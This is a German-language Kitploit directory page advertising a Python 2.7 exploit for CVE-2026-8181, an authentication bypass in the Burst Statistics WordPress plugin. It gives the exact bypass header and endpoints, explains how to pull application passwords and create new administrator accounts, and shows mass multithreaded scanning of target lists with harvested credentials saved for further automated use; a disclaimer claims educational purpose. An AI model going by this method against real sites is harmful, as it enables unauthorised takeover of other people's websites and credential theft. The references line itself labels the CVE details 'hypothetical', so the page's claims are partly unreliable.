Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-8181 — CVE-2026-8181: Burst Statistics Auth Bypass → REST-API-Übernahme & Admin-Erstellung. Python 2.7. Nur für Bildungszwecke. | Kitploit
Tools/GitHubGitHub/jenderal92/cve-2026-8181
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & Bildung
GitHubjenderal92/cve-2026-8181

CVE-2026-8181

CVE-2026-8181: Burst Statistics Auth Bypass → REST-API-Übernahme & Admin-Erstellung. Python 2.7. Nur für Bildungszwecke.

Repository anzeigen
5vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-8181 – Exploit für die Umgehung der Authentifizierung bei Burst Statistics

Python-2.7-Exploit für die Schwachstelle im Burst-Statistics-Plugin (CVE-2026-8181), der es nicht authentifizierten Angreifern ermöglicht, die REST-API-Authentifizierung zu umgehen, Anwendungspasswörter abzurufen und neue Administrator-Benutzer auf verwundbaren WordPress-Websites zu erstellen.

⚠️ Haftungsausschluss
Dieses Tool dient ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken. Unbefugter Zugriff auf Computersysteme ist illegal. Verwenden Sie es nur auf Websites, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben. Weitere Haftungsausschlüsse finden Sie auf der Titelseite von Jenderal92. Sie können sie HIER !!! einsehen.

CVE-2026-8181 betrifft das Burst-Statistics-Plugin für WordPress (Versionen vor dem Patch). Die Schwachstelle liegt im Authentifizierungsmechanismus der REST-API und ermöglicht einem Angreifer Folgendes:

  • Die Authentifizierung umgehen, indem ein präparierter X-BURSTMAINWP-Header gesendet wird
  • Anwendungspasswörter über den Endpunkt /burst/v1/mainwp-auth abrufen
  • Privilegierte Aktionen (Benutzer auflisten, Einstellungen lesen, neue Admin-Konten erstellen) über die WordPress-REST-API ausführen

Funktionen

  • Multithread-Scanning (Standard: 10 Threads)
  • Automatische Erkennung von WordPress-Basispfaden (, , )
/
/wordpress
/wp
  • Benutzernamen-Enumeration über /wp-json/wp/v2/users oder Autor-ID-Weiterleitungen
  • Ausnutzung des Auth-Bypasses, um:
    • Anwendungspasswörter (Base64-codiertes Token) zu erhalten
    • Den Zugriff auf sensible REST-Endpunkte (Einstellungen, Plugins, Admin-Benutzer) zu verifizieren
    • Einen neuen Administrator-Benutzer mit zufälligen Anmeldedaten zu erstellen
  • Zwei Ausgabedateien:
    • res_login.txt – Prägnante, mit Pipe getrennte REST-API-Anmeldedaten (leicht zu parsen/importieren)
    • full_res_login.txt – Vollständiger, menschenlesbarer Bericht einschließlich Zugriffsverifizierung und Anwendungspasswörter
  • Voraussetzungen

    • Python 2.7 (veraltet, aber vom Skript benötigt)
    • Bibliothek requests
    root@kitploit:~
    pip install requests
    

    Verwendung

    1. Erstellen Sie eine Ziellistendatei (eine Domain oder IP pro Zeile, mit oder ohne http:///https://).

      Beispiel targets.txt:

      root@kitploit:~
      example.com
      https://vulnerable-site.com
      127.0.0.1/wordpress
      
    2. Führen Sie den Exploit aus:

    root@kitploit:~
    python2 CVE-2026-8181.py targets.txt
    
    1. Die Ergebnisse werden in zwei Dateien im aktuellen Verzeichnis gespeichert:
      • res_login.txt – REST-API-Anmeldedaten (eine Zeile pro verwundbarem Ziel)
      • full_res_login.txt – Detaillierter Bericht

    Befehlszeilenoptionen

    ArgumentBeschreibung
    list.txtPfad zur Datei, die die Ziel-URLs enthält

    Beispielausgabe (Konsole)

    root@kitploit:~
    ============================================================
    CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
    ============================================================
    [*] Total targets: 2
    [*] Threads: 10
    [*] Base paths: ['', '/wordpress', '/wp']
    
    [*] Scanning: example.com
        Trying path: /
        Detected username: admin
        [+] VULNERABLE! REST API bypass successful
        [+] Application Password obtained!
        [+]   Username: admin
        [+]   App Password: xxxx xxxx xxxx
        [+]   Base64 Token: YWRtaW46eHh4eA==
        [+] Access confirmed: WordPress settings
        [+] Access confirmed: Installed plugins
        [+] Access confirmed: Admin users
        [+] Admin user created via REST API: wp_abc123
        [+] Results saved to res_login.txt and full_res_login.txt
    

    Formate der Ausgabedateien

    1. res_login.txt – Prägnante REST-API-Anmeldedaten

    Jede Zeile folgt diesem mit Pipe getrennten Format:

    root@kitploit:~
    target|username|password|email|user_id
    

    Beispiel:

    root@kitploit:~
    http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
    

    Dieses Format ist ideal für:

    • Den Import in Passwortmanager oder Datenbanken
    • Die Automatisierung weiterer Aktionen (z. B. Anmeldeskripte)
    • Die schnelle Prüfung mit cut, grep oder Excel

    2. full_res_login.txt – Vollständiger detaillierter Bericht

    Für jedes verwundbare Ziel fügt das Skript einen menschenlesbaren Block hinzu:

    root@kitploit:~
    ============================================================
    Target: http://example.com
    ============================================================
    
    [+] Access Verification:
        [+] WordPress settings
        [+] Installed plugins
        [+] Admin users
    
    [+] REST API Credentials:
        Username: wp_abc123
        Password: random12char
        Email: [email protected]
        User ID: 42
        URL: http://example.com/wp-admin/
        Note: Use with X-BURSTMAINWP header
    
    [+] Application Password:
        Username: admin
        App Password: xxxx xxxx xxxx
        Base64 Token: YWRtaW46eHh4eA==
    

    Hinweis: Wenn der Endpunkt für das Anwendungspasswort nicht verfügbar ist oder kein Token zurückgibt, zeigt dieser Abschnitt FAILED an.

    So funktioniert es

    1. Zielvorbereitung – Fügt http:// als Präfix hinzu, falls es fehlt, und entfernt abschließende Schrägstriche.
    2. Pfaditeration – Testet /, /wordpress und /wp als WordPress-Basisverzeichnisse.
    3. Benutzernamen-Enumeration – Ruft /wp-json/wp/v2/users ab oder nutzt ?author=N-Weiterleitungen.
    4. Bypass-Test – Sendet X-BURSTMAINWP: 1 + Basic Auth mit Benutzername und Dummy-Passwort (CVE-2026-8181). Wenn der Endpunkt /wp-json/wp/v2/users/me?context=edit den Status 200 zurückgibt, ist die Website verwundbar.
    5. Ausnutzung –
      • Fordert /wp-json/burst/v1/mainwp-auth an, um ein Anwendungspasswort-Token zu erhalten.
      • Verifiziert den Zugriff auf /settings, /plugins, /users.
      • Erstellt ein neues Administrator-Konto über POST /wp-json/wp/v2/users.
    6. Speichern der Ergebnisse – Schreibt prägnante REST-Anmeldedaten in res_login.txt und vollständige Details in full_res_login.txt.

    Anpassung

    Sie können diese Variablen im Skript ändern:

    • THREADS – Anzahl der gleichzeitigen Threads (Standard: 10)
    • BASE_PATHS – Zusätzliche WordPress-Unterverzeichnisse, die geprüft werden sollen
    • requests-Timeout-Werte

    Lizenz

    Dieses Projekt wird ausschließlich zu Bildungszwecken bereitgestellt. Nutzung auf eigene Gefahr.

    Referenzen

    • CVE-2026-8181-Details (hypothetisch)
    • Burst-Statistics-Plugin (betroffene Versionen)
    Tool herunterladen